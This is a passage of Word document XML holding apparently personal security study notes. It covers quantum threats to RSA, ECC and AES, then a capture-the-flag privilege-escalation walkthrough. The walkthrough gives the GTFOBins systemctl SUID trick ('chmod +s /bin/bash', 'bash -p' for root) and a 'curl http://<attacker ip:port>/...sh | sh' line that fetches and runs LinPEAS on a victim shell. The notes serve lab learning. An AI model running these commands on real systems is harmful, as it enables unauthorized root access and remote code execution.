        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Wont</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> exist in the coming years but will likely be able to break RSA and Elliptical Curve</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C4366A1" w14:textId="3BD71988" w:rsidR="00374570" w:rsidRPr="0084205E" w:rsidRDefault="00374570" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>AES/DES and Quantum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45FB3FC3" w14:textId="514021F2" w:rsidR="00374570" w:rsidRPr="0084205E" w:rsidRDefault="00374570" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">128 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> will be broke</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="246319DB" w14:textId="51107184" w:rsidR="00374570" w:rsidRPr="0084205E" w:rsidRDefault="00374570" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">256 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>bit</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> will be more resistant</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EDFB6E2" w14:textId="183A1201" w:rsidR="00374570" w:rsidRPr="0084205E" w:rsidRDefault="00374570" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Triple DES will be vulnerable</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D169D6" w14:textId="6F9E1C5B" w:rsidR="00374570" w:rsidRPr="0084205E" w:rsidRDefault="00374570" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Current Recommendations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261596D8" w14:textId="7F3FFC8B" w:rsidR="00374570" w:rsidRPr="0084205E" w:rsidRDefault="00374570" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>RSA-3072 or better for asymmetric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C84CC4" w14:textId="4E1D9220" w:rsidR="00374570" w:rsidRPr="0084205E" w:rsidRDefault="00374570" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:lastRenderedPageBreak/>
        <w:t>AES-256 or better for symmetric</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7BAD5D" w14:textId="30A2A680" w:rsidR="00374570" w:rsidRPr="0084205E" w:rsidRDefault="00374570" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="18"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cryptography Apocalypse by Roger A Grimes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADA50F1" w14:textId="1FEACA5C" w:rsidR="00C9744E" w:rsidRPr="0084205E" w:rsidRDefault="00C9744E" w:rsidP="0084205E">
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:sz="6" w:space="1" w:color="auto"/>
        </w:pBdr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6285E02F" w14:textId="44F654CC" w:rsidR="00516008" w:rsidRPr="0084205E" w:rsidRDefault="00C9744E" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>GTFOBins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001904DC" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> + SUID (set owner </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="001904DC" w:rsidRPr="0084205E">
        <w:t>userId</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="001904DC" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> upon execution) </w:t>
      </w:r>
      <w:r w:rsidR="00516008" w:rsidRPr="0084205E">
        <w:t>–</w:t>
      </w:r>
      <w:r w:rsidR="001904DC" w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00516008" w:rsidRPr="0084205E">
        <w:t>escaping a user shell by breaking the sequence by spawning a new shell that allows root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40EE7E00" w14:textId="3626B447" w:rsidR="00C9744E" w:rsidRPr="0084205E" w:rsidRDefault="00C9744E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Found /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> in victim box</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05DED2BA" w14:textId="655AF807" w:rsidR="00C9744E" w:rsidRPr="0084205E" w:rsidRDefault="00C9744E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>GTFObins</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="6DEA2245" w14:textId="23885368" w:rsidR="00C9744E" w:rsidRPr="0084205E" w:rsidRDefault="00C9744E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Returns a shell script that can be used to escalate privilege</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FF48FA7" w14:textId="787FB8A7" w:rsidR="00C9744E" w:rsidRPr="0084205E" w:rsidRDefault="00C9744E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Change .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> to /bin/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>systemctl</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="56DBD74D" w14:textId="1BB3A591" w:rsidR="00C9744E" w:rsidRPr="0084205E" w:rsidRDefault="00C9744E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Change /</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">/output </w:t>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidRPr="0084205E">
        <w:t>”</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>chmod</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> +s /bin/bash”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55E3660B" w14:textId="27FD0D36" w:rsidR="00C9744E" w:rsidRPr="0084205E" w:rsidRDefault="00C9744E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Spawns bash session</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31F08764" w14:textId="29A9C3B0" w:rsidR="00C9744E" w:rsidRPr="0084205E" w:rsidRDefault="00C9744E" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Copy </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>paste</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> into terminal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C4F487" w14:textId="597A3B9C" w:rsidR="001904DC" w:rsidRPr="0084205E" w:rsidRDefault="001904DC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1891A0" w14:textId="3BFA2A12" w:rsidR="001904DC" w:rsidRPr="0084205E" w:rsidRDefault="001904DC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enter</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA57C41" w14:textId="765017EE" w:rsidR="001904DC" w:rsidRPr="0084205E" w:rsidRDefault="001904DC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Ls -l /bin/bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79B2FED7" w14:textId="723235F9" w:rsidR="001904DC" w:rsidRPr="0084205E" w:rsidRDefault="001904DC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Confirm -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>rwsr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sr</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>-x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B4D920A" w14:textId="3010312F" w:rsidR="001904DC" w:rsidRPr="0084205E" w:rsidRDefault="001904DC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Bash -p</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="783BB25C" w14:textId="3F3579CB" w:rsidR="001904DC" w:rsidRPr="0084205E" w:rsidRDefault="001904DC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>Uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> = www-data BUT </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>euid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> (effective </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>uid</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>) = 0 (root)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="018E3D70" w14:textId="7F6880F7" w:rsidR="001904DC" w:rsidRPr="0084205E" w:rsidRDefault="001904DC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Cd to root</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67287060" w14:textId="45B101CE" w:rsidR="001904DC" w:rsidRPr="0084205E" w:rsidRDefault="001904DC" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="3"/>
          <w:numId w:val="19"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Capture flag</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329F03D8" w14:textId="520F8FE9" w:rsidR="00516008" w:rsidRPr="0084205E" w:rsidRDefault="00516008" w:rsidP="0084205E">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>LinPEAS</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3A10AEA5" w14:textId="01596D12" w:rsidR="00516008" w:rsidRPr="0084205E" w:rsidRDefault="003E0338" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Attacking machine</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EB9EE28" w14:textId="779B5275" w:rsidR="003E0338" w:rsidRPr="0084205E" w:rsidRDefault="003E0338" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Python -m </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>SimpleHTTPServer</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CB74EF6" w14:textId="463F8A0F" w:rsidR="003E0338" w:rsidRPr="0084205E" w:rsidRDefault="003E0338" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Allows local machine files to be accessed via reverse shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0EA045EE" w14:textId="4AB72057" w:rsidR="003E0338" w:rsidRPr="0084205E" w:rsidRDefault="003E0338" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Input in URL of browser too for visual</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E607C2D" w14:textId="2A53352F" w:rsidR="003E0338" w:rsidRPr="0084205E" w:rsidRDefault="003E0338" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Download raw </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linpea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>github</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> repository and put into .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="552C18E0" w14:textId="5EC4A932" w:rsidR="003E0338" w:rsidRPr="0084205E" w:rsidRDefault="003E0338" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>To be accessed from shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="399BC7CB" w14:textId="5A185D71" w:rsidR="003E0338" w:rsidRPr="0084205E" w:rsidRDefault="003E0338" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Victim Shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C5A405" w14:textId="76F06527" w:rsidR="003E0338" w:rsidRPr="0084205E" w:rsidRDefault="003E0338" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Go into </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>tmp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> directory</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F6572BD" w14:textId="58D576C2" w:rsidR="003E0338" w:rsidRPr="0084205E" w:rsidRDefault="003E0338" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">Curl http://&lt;attacker </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>ip:port</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve">&gt;/&lt;raw </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>linpea</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> file&gt;.</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0084205E">
        <w:t xml:space="preserve"> | </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0084205E">
        <w:t>sh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1039D02A" w14:textId="7569B08A" w:rsidR="003E0338" w:rsidRPr="0084205E" w:rsidRDefault="003E0338" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Enter to run</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72A69138" w14:textId="4444CFF6" w:rsidR="003E0338" w:rsidRPr="0084205E" w:rsidRDefault="003E0338" w:rsidP="0084205E">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="20"/>
        </w:numPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="6786"/>
        </w:tabs>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r w:rsidRPr="0084205E">
        <w:t>Results in privilege escalation script to assist in vuln detection</w:t>
      </w:r>
    </w:p>
